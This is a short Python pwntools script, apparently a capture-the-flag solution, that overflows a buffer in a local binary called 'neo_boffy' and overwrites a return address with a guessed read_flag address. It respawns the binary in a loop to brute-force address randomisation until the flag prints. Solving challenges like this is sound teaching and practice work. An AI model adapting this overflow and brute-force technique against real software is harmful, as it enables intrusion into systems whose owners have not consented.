from pwn import *

bin_path = "./neo_boffy"
# The retry loop below spawns this binary many times; silence pwntools'
# per-process console output so only the final result is printed.
context.log_level = "ERROR"
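# Can't send NULLs, but can send empty strings
def cmdify(text):
    """Split *text* on NUL bytes into an argv list.

    argv entries cannot contain NUL, so a payload that includes NULs is
    passed as the list of NUL-separated pieces (empty strings are allowed).
    The parameter was previously named ``str``, shadowing the builtin; the
    only caller on this page passes it positionally.
    """
    return text.split("\x00")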
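read_flag_offset = 0x8d0
# No ASLR leak is available, so the base is hard-coded and the loop below
# simply re-runs the binary until the guess lands.
read_flag = 0x565ee000 + read_flag_offset
loop_cap = 0x78  # this is where the loop caps

# NOTE(review): the payload is built as a str and concatenated with p32();
# that is Python-2 behaviour (p32() returns bytes on Python 3) -- confirm
# the interpreter this was written for.
payload = ""
payload += "\x00" * 3  # ensure we can keep looping
payload += p32(read_flag)
# Last byte encodes the remaining count so the loop stops exactly at the cap.
payload += chr(loop_cap - 1 - len(payload))
payload = payload.rjust(0x79, "A")

# Keep trying until the flag appears in the output. Every spawned process is
# closed explicitly: the loop is unbounded, and leaking one pipe/fd per
# attempt would exhaust the fd limit long before a rare success.
while True:
    p = process([bin_path] + cmdify(payload))
    try:
        out = p.recvall()
    finally:
        p.close()
    if "CTF{" in out:
        print(out)
        break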